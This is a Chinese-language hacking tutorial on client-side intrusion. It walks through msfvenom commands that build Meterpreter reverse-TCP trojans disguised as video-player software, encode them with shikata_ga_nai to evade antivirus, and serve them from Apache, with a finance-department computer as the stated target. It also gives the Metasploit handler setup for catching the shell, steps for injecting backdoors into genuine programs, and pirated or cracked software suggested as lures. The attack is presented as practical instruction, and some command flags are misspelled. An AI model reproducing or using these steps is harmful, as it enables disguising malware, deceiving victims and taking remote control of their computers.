1.客户端渗透原理
无法突破对方网络边界的时候,向目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来诱骗受害者执行恶意程序。
我们要利用免杀来躲避安全软件的查杀。
制作windows恶意软件获取shell
Msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在主机上执行,在本地监听上线。
2.实战-制作windows恶意软件获取公司财务电脑使用msfvenom生成快播和西瓜影音看片神器后门木马
Kali运行handler,payload 在目标IP xxx端口监听后门请求
生成西瓜影音.exe windows 下的恶意软件
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LOHSTS=192.168.xxx.xxx LPROT=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/西瓜影音1.exe
-a 指定构架如x86 x64。 x86代表32位, x64代表64位。 32位软件可以在64 位系统上运行。所以我们生成32位的后门。这样在32位和64位系统中都可以使用。
–platform 指定平台,这里选择windows 通过 --l platform可以查看所有支持平台。
-p 设置攻击载荷,我们使用windows/meterpreter/reverse_tcp,可以通过-l payloads 查看所有攻击载荷
-e 指定编码器,也就是所谓的免杀, x64/shikata_ga_nai是msf自带的编码器 -l encode 查看有多少编码器
-i 制作的软件字节,可随意
完成后需要启动阿帕奇服务:
systemctl start apache2[默认是不启动的]
完成后先监听,等目标运行
msfvenom --l platforms 看看它针对多少平台
msfvenom --l encoders 看看它有多少编码器
msfvenom --l payloads 看看可以使用的payload有多少
不多说,先进入框架监听
msfdb run
use exploit/multi/handler
Show options
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.xxx.xxx
show options
run
开始监听,此处目标机windows 7 IP为目标IP
介绍一个网页,它通过多种杀毒引擎扫描文件,以此判断免杀能力2333
https://www.virustotal.com
https://www.virscan.org
Window 7 运行你制作的软件时,kali则建立连接然后在kali看看ipconfig, getuid,help
pwd 显示后门的当前目录
如何给真正的软件加上后门?
模拟黑客给真正的软件加上后门:
Windows激活工具,私服客户端,盗版游戏,看片神器,彩票,抢红包软件,PS激活工具,CRT激活工具,注册机…
1.先下载一个正常的快播软件【最好是绿色版】因为植入的成功率大一些
2.观察主程序运行时,有哪些附带软件运行,在附带软件中植入3.将软件传到kali里面【使用Xshell】输入rz
4.ls发现就在桌面
5.Msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.xxx.xxx -b “x00” -e x86/shikata_ga_nai -i 10 -x [文件名] -f exe -o /var/www/html/[文件名].exe
search evasion
使用第一个生成后门木马
use [模块]
Show options
set filename [文件名].exe
set payload [模块]
set LHOSTS 192.168.xxx.xxx
Run
cp [得到的目录] var/www/html/[文件]
Use exploit/multi/handler
Set payload [模块]
Set RHOSTS 192.168.xxx.xxx
Show options
Run
Window 7 打开浏览器下载 https://192.168.xxx.xxx/[文件名].exe
Getuid 查看权限
通过这种方法生成的软件免杀能力比前者更强